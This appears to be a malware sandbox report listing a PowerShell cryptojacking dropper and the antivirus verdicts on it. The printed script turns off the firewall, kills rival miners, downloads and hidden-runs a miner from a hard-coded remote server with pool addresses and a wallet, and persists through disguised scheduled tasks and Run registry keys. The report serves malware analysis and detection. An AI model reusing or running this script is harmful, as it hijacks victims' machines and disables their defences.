popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$cc = "http://80.71.158.96"
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="$env:AppData\network02.exe"
$dst2="$env:TMP\network02.exe"
netsh advfirewall set allprofiles state off
Get-Process network0*, kthreaddi, sysrv, sysrv012, sysrv011, sysrv010, sysrv00* -ErrorAction SilentlyContinue | Stop-Process
# ps | Where-Object { $_.cpu -gt 50 -and $_.name -ne "[kthreaddi]" } | Stop-Process
$list = netstat -ano | findstr TCP
for ($i = 0; $i -lt $list.Length; $i++) {
$k = [Text.RegularExpressions.Regex]::Split($list[$i].Trim(), '\s+')
if ($k[2] -match "(:3333|:4444|:5555|:7777|:9000)$") {
Stop-Process -id $k[4]
if (!(Get-Process *network02] -ErrorAction SilentlyContinue)) {
(New-Object Net.WebClient).DownloadFile("$cc/wxm.exe", "$dst")
(New-Object Net.WebClient).DownloadFile("$cc/wxm.exe", "$dst2")
Start-Process "$dst2" "--donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ" -windowstyle hidden
schtasks /create /F /sc minute /mo 1 /tn "BrowserUpdate" /tr "$dst --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B" /t REG_SZ /f
schtasks /create /F /sc minute /mo 1 /tn "Browser2Update" /tr "$dst2 --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d "$dst2 --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B" /t REG_SZ /f
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Miner.4!c
MicroWorld-eScan Heur.BZC.PZQ.Biom.8.4644D49B
FireEye Heur.BZC.PZQ.Biom.8.4644D49B
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Trojan.PS.CoinMiner.XU
Cyren PSH/CoinMiner.B
Symantec Trojan Horse
ESET-NOD32 PowerShell/CoinMiner.CC
TrendMicro-HouseCall TROJ_FRS.0NA103AJ22
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Miner.gen
BitDefender Heur.BZC.PZQ.Biom.8.4644D49B
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Heur.BZC.PZQ.Biom.8.4644D49B
Emsisoft Heur.BZC.PZQ.Biom.8.4644D49B (B)
Comodo Clean
F-Secure Clean
DrWeb PowerShell.BtcMine.1
VIPRE Clean
TrendMicro TROJ_FRS.0NA103AJ22
McAfee-GW-Edition Clean
CMC Clean
Sophos Troj/PSDl-MG
GData Heur.BZC.PZQ.Biom.8.4644D49B
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Heur.BZC.PZQ.Biom.8.4644D49B
MAX malware (ai score=87)
VBA32 Clean
Zoner Clean
Tencent Script.Trojan.Miner.Ajvb
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.